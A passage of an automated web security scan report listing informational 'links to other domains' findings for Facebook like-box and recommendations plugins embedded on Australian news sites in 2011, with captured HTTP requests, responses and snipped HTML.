http://profile.ak.fbcdn.net/hprofile-ak-snc4/275276_1523985306_6564669_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275543_834890067_168097_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/368744_100001317317071_4811202_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41675_1174777103_7143_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css

Request

Response

14.82. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fntnews&width=316&height=255&colorscheme=light&show_faces=true&stream=false&header=false

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-ash2/50555_361389970597_5398_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187442_100002363335599_8263947_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195233_1561190024_7030162_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/260924_1020537541_4865196_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27350_100000745985153_6622_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27409_701671179_2058_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274555_622021559_4632061_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274973_516637381_1848119_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/276288_100002562088108_3604958_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41418_717746037_7300_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49856_841519469_5645_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fntnews&width=316&height=255&colorscheme=light&show_faces=true&stream=false&header=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.58.30
X-Cnection: close
Date: Wed, 07 Sep 2011 14:17:47 GMT
Content-Length: 12604

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ntnews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/50555_361389970597_5398_q.jpg" alt="The NT News" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27409_701671179_2058_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1020537541" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260924_1020537541_4865196_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000745985153" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27350_100000745985153_6622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=717746037" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41418_717746037_7300_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gbahnert" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276288_100002562088108_3604958_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/matthewhepworth23" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274555_622021559_4632061_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=841519469" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49856_841519469_5645_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/dimitrios.panatos" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274973_516637381_1848119_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1561190024" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195233_1561190024_7030162_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002363335599" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187442_100002363335599_8263947_q.jpg" alt="" /><div class="name">
...[SNIP]...

14.83. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/pages/themercurycomau/100660463407&width=315&colorscheme=light&connections=10&stream=false&header=true&height=300

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-ash2/187551_1371743602_8253189_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-ash2/275747_100000126594989_5503647_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-ash2/276239_560289439_1121105_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/173403_1845960870_4748722_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187903_100660463407_8142103_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/261035_1030147253_5551343_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273595_100000526888348_4158916_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274311_544896881_3369901_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275570_1698292276_4826442_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/276277_100002947861474_4894411_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49549_1280631399_2637359_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css

Request

GET /plugins/likebox.php?href=http://www.facebook.com/pages/themercurycomau/100660463407&width=315&colorscheme=light&connections=10&stream=false&header=true&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.56.34
X-Cnection: close
Date: Wed, 07 Sep 2011 14:18:35 GMT
Content-Length: 12835

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/themercurycomau/100660463407" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187903_100660463407_8142103_q.jpg" alt="themercury.com.au" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000526888348" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273595_100000526888348_4158916_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rebecca.vanbruggen" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275570_1698292276_4826442_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/williamthe.wiseowl" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173403_1845960870_4748722_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/276239_560289439_1121105_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/georgia.duncan" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274311_544896881_3369901_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1280631399" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49549_1280631399_2637359_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276277_100002947861474_4894411_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275747_100000126594989_5503647_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/michele.nellis" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/261035_1030147253_5551343_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1371743602" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/187551_1371743602_8253189_q.jpg" alt="" /><div class="name">
...[SNIP]...

14.84. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=135447496484311&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df118a03298%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=290&href=http%3A%2F%2Fwww.perthnow.com.au%2F&id=92409946191&locale=en_US&sdk=joey&show_faces=true&stream=false&width=316

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161096_1434751931_4403318_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174512_100000721997383_331806_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195409_521993592_536077_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195796_92409946191_1569173_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203081_100000810087415_3285586_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/260805_603742934_6842000_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273600_1091675222_3562420_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274093_668827070_3190578_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274255_1209460632_1108806_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274270_100000838710015_7660413_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274497_688778542_3944546_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275274_100000811271692_729834_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275534_506097779_7034957_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275565_564560356_4188954_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275805_1411910671_2156252_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/276356_791923818_4442424_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.150.43
X-Cnection: close
Date: Wed, 07 Sep 2011 14:14:49 GMT
Content-Length: 13997

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/perthnow" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195796_92409946191_1569173_q.jpg" alt="Perth Now" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=564560356" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275565_564560356_4188954_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274255_1209460632_1108806_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1411910671" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275805_1411910671_2156252_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pippa.mcmanus" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260805_603742934_6842000_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=791923818" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276356_791923818_4442424_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274497_688778542_3944546_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1091675222" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273600_1091675222_3562420_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/meiliana.livianto" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174512_100000721997383_331806_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DangerousVampress" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275534_506097779_7034957_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1434751931" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161096_1434751931_4403318_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000811271692" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275274_100000811271692_729834_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000838710015" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274270_100000838710015_7660413_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000810087415" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203081_100000810087415_3285586_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=521993592" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195409_521993592_536077_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=668827070" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274093_668827070_3190578_q.jpg" alt="" /><div class="name">
...[SNIP]...

14.85. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?height=300&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.themercury.com.au%2F&width=310

The response contains the following links to other domains:

http://external.ak.fbcdn.net/safe_image.php?d=AQCOFIMxfITNwtUo&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fuploads%2Fimages%2Fuploads%2Fweddings%2Fwedding.jpg
http://external.ak.fbcdn.net/safe_image.php?d=AQDe1s_p8lDtl-9c&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fglobal%2Frightcol-attitude.jpg
http://www.themercury.com.au/article/2011/09/04/258821_tasmania-news.html
http://www.themercury.com.au/article/2011/09/05/258911_tasmania-news.html
http://www.themercury.com.au/article/2011/09/06/259281_tasmania-news.html
http://www.themercury.com.au/article/2011/09/06/259391_todays-news.html
http://www.themercury.com.au/article/2011/09/07/259441_tasmania-news.html
http://www.themercury.com.au/article/2011/09/07/259471_tasmania-news.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.59
X-Cnection: close
Date: Wed, 07 Sep 2011 14:18:53 GMT
Content-Length: 23268

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_34a24f43f3ab6efc"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Overcoming language barriers Tasmania News - The Mercury - The Voice of Tasmania" href="http://www.themercury.com.au/article/2011/09/06/259281_tasmania-news.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDe1s_p8lDtl-9c&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fglobal%2Frightcol-attitude.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.themercury.com.au/article/2011/09/06/259281_tasmania-news.html" target="_blank">Overcoming language barriers Tasmania News - The Mercury - The Voice of Tasmania</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_168355b60f763834"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Last of the Ground Zero dogs Today's News - The Mercury - The Voice of Tasmania" href="http://www.themercury.com.au/article/2011/09/06/259391_todays-news.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCOFIMxfITNwtUo&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fuploads%2Fimages%2Fuploads%2Fweddings%2Fwedding.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.themercury.com.au/article/2011/09/06/259391_todays-news.html" target="_blank">Last of the Ground Zero dogs Today's News - The Mercury - The Voice of Tasmania</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_68d032d4a8bab3fb"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Roll out the red carpet Tasmania News - The Mercury - The Voice of Tasmania" href="http://www.themercury.com.au/article/2011/09/04/258821_tasmania-news.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDe1s_p8lDtl-9c&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fglobal%2Frightcol-attitude.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.themercury.com.au/article/2011/09/04/258821_tasmania-news.html" target="_blank">Roll out the red carpet Tasmania News - The Mercury - The Voice of Tasmania</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_57272d9eb4db68d0"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Devil research nets prize Tasmania News - The Mercury - The Voice of Tasmania" href="http://www.themercury.com.au/article/2011/09/07/259471_tasmania-news.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDe1s_p8lDtl-9c&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fglobal%2Frightcol-attitude.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.themercury.com.au/article/2011/09/07/259471_tasmania-news.html" target="_blank">Devil research nets prize Tasmania News - The Mercury - The Voice of Tasmania</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5f8f5cfdc9ebf19c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Ante raised in compo impasse Tasmania News - The Mercury - The Voice of Tasmania" href="http://www.themercury.com.au/article/2011/09/07/259441_tasmania-news.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDe1s_p8lDtl-9c&url=http%3A%2F%2Fwww.themercury.com.au%2Fimages%2Fglobal%2Frightcol-attitude.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.themercury.com.au/article/2011/09/07/259441_tasmania-news.html" target="_blank">Ante raised in compo impasse Tasmania News - The Mercury - The Voice of Tasmania</a>
...[SNIP]...
